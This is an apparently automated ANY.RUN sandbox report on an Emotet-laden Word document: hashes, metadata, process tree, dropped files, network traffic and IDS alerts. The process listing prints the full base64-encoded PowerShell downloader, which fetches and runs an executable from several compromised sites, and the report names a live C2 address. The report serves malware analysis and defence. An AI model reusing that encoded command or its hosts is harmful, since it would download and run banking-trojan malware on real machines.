analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DOC 7710 97322832.doc

Full analysis: https://app.any.run/tasks/ef747279-5d48-4c55-b361-87e2458fd1ad
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 14, 2019, 21:24:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: integrate Soft, Subject: Checking Account, Author: Laurine Beer, Comments: navigate Rustic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 17:10:00 2019, Last Saved Time/Date: Tue May 14 17:10:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5:

BA068FE1B4BFC6ABC34415A610D21CE8

SHA1:

1F689CC546A24F78BE29422980FF2BDC761458BE

SHA256:

9D9A146BFCE8BC42F3835E6C4025535D816924734F3DFB41B189893DA33C1CF7

SSDEEP:

3072:v77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q47PfIiOmic9eSx/NgP9:v77HUUUUUUUUUUUUUUUUUUUT52VVDXO7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • soundser.exe (PID: 2552)
      • 235.exe (PID: 644)
      • soundser.exe (PID: 2384)
      • 235.exe (PID: 3544)
    • Connects to CnC server

      • soundser.exe (PID: 2384)
    • EMOTET was detected

      • soundser.exe (PID: 2384)
    • Emotet process was detected

      • soundser.exe (PID: 2552)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3392)
      • 235.exe (PID: 3544)
    • Creates files in the user directory

      • powershell.exe (PID: 3392)
    • Starts itself from another location

      • 235.exe (PID: 3544)
    • Application launched itself

      • soundser.exe (PID: 2552)
    • Connects to server without host name

      • soundser.exe (PID: 2384)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3332)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3332)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Daugherty
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 196
Paragraphs: 1
Lines: 1
Company: Keebler Inc
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 168
Words: 29
Pages: 1
ModifyDate: 2019:05:14 16:10:00
CreateDate: 2019:05:14 16:10:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: navigate Rustic
Keywords: -
Author: Laurine Beer
Subject: Checking Account
Title: integrate Soft
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 235.exe no specs 235.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3332"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC 7710 97322832.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3392powershell -enc JAByADQANwAyADMANwA4AD0AJwBNADcANgAwADUANQA2ADIAJwA7ACQAcwA4ADkAOAA0ADQAMQA5ACAAPQAgACcAMgAzADUAJwA7ACQAcwA2ADUAOAA3ADQAMQA2AD0AJwBEADAAOAAyADMAMQAnADsAJAB0ADYAMgA4ADYAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcwA4ADkAOAA0ADQAMQA5ACsAJwAuAGUAeABlACcAOwAkAE8ANgAxADcAMgAxADIANAA9ACcAUQA5ADMAMAA3ADMANgAnADsAJABUADMANAA1ADYAOAA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAYABCAGMATABgAGkAYABFAE4AVAA7ACQAbQA0ADcANAA3ADgANQA2AD0AJwBoAHQAdABwADoALwAvAHIAaQB2AGUAcgBzAG8AZgB0AGIAZAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYARgBpAGsAYQBRAGoAWQBnAC8AQABoAHQAdABwADoALwAvAGQAYQB5AGkAbwBnAGwAdQB1AG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEQAaABNAG8AeABQAHIAdwBDAC8AQABoAHQAdABwADoALwAvAHQAaABlAHIAYQB0AHQAZwBhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHkAbwBzADQAdQA2AGgAXwBwAHQAOAB3AGQAYgAtADMALwBAAGgAdAB0AHAAOgAvAC8AYgBlAHkAYQB6AGcAYQByAGEAZwBlAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ATgB1AHkAZwBpAE0ARgBvAFIAQwAvAEAAaAB0AHQAcAA6AC8ALwBrAHMAYQBmAGUAdAB5AC4AaQB0AC8AYQB3AHMAdABhAHQAcwAtAGkAYwBvAG4ALwBiAGgAcgBkAGQANQBfADUAMgBoAHEAOAA5AC0AMwA0AC8AJwAuAHMAUABMAGkAdAAoACcAQAAnACkAOwAkAHIANgAwADcAMwAzADkAMgA9ACcAbAAyADQAXwA0AF8AOAAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABJAF8ANQAyADgAMAA2ADIAIABpAG4AIAAkAG0ANAA3ADQANwA4ADUANgApAHsAdAByAHkAewAkAFQAMwA0ADUANgA4AC4AZABvAHcAbgBsAE8AYQBEAEYASQBsAEUAKAAkAEkAXwA1ADIAOAAwADYAMgAsACAAJAB0ADYAMgA4ADYAMQApADsAJABWADcAMwA2ADgAMgAwAD0AJwBOADYANwBfADIAOAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAHQANgAyADgANgAxACkALgBsAEUATgBHAHQAaAAgAC0AZwBlACAAMgA2ADAAOQA0ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawAnACsAJwBlAC0ASQB0AGUAbQAnACkAIAAkAHQANgAyADgANgAxADsAJABuADQANAAwADUANwAxADMAPQAnAHYAMAAwADQAMwBfADUAMwAnADsAYgByAGUAYQBrADsAJAB3ADIANQBfAF8ANQA0AD0AJwBKADMAMQA2ADkAMgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABkADMAOAA1ADUAMgAxAF8APQAnAEkANQBfADgANgAxADEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
644"C:\Users\admin\235.exe" C:\Users\admin\235.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3544--ebe2cb72C:\Users\admin\235.exe
235.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2552"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
235.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2384--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 776
Read events
1 291
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
3332WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRED1C.tmp.cvr
MD5:
SHA256:
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U427VIIQF9G27UYD7IQB.temp
MD5:
SHA256:
3332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F964D4F7.wmfwmf
MD5:7E4D76AE77275FD9026D0A420165C56E
SHA256:E426AF68C1E8A388334D08D04E24759CF65B8EDCC4BB60D262A519B98523DA22
3332WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C 7710 97322832.docpgc
MD5:547064AFCF54A197CF37025F75AA91EA
SHA256:A8F916B305B787E3168D8C950821A646DCD879C14937F5EA35D14DFDF216B993
3392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fcfb.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F483AB4.wmfwmf
MD5:A2C801A80BAF00195780910F6493D4A5
SHA256:9701BB94D3E60AB9C1C387CA8EF2C65D7F97D76B47A319CAF00882610779DB61
3332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14E5A841.wmfwmf
MD5:9EB36D08C34925819CC91CC6D628168F
SHA256:623A76D42AC6BCF5EED1506D1295D9AD8547516D26E31DBAA4DAE11654DEF215
3392powershell.exeC:\Users\admin\235.exeexecutable
MD5:4F755FEF4A94EECBFCE7AB4FC5D70391
SHA256:71DD8C35448FA4D479A2A4AB4582FE7B95E9BE7517BC5D049D10BB79B26A45EA
3332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF0C714E.wmfwmf
MD5:319F9878ABB5E081DD7AB5D6A6FF4015
SHA256:6AB9569F6FCD2FF6B2AF529BA80048DB15DC519CD467C0C641C074796404443D
3332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19A2B325.wmfwmf
MD5:CA0B44577CDD0C42234EEFEDDCEE18D4
SHA256:C761177B308670DE41666810914B1CF426D93C60889B456A1B3F21FDCCC1646F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3392
powershell.exe
GET
99.198.101.186:80
http://riversoftbd.com/wp-content/vFikaQjYg/
US
suspicious
2384
soundser.exe
POST
200.85.46.122:80
http://200.85.46.122/teapot/img/ringin/merge/
PY
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2384
soundser.exe
200.85.46.122:80
Telecel S.A.
PY
malicious
3392
powershell.exe
99.198.101.186:80
riversoftbd.com
SingleHop, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
riversoftbd.com
  • 99.198.101.186
suspicious

Threats

PID
Process
Class
Message
3392
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3392
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3392
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2384
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3 ETPRO signatures available at the full report
No debug info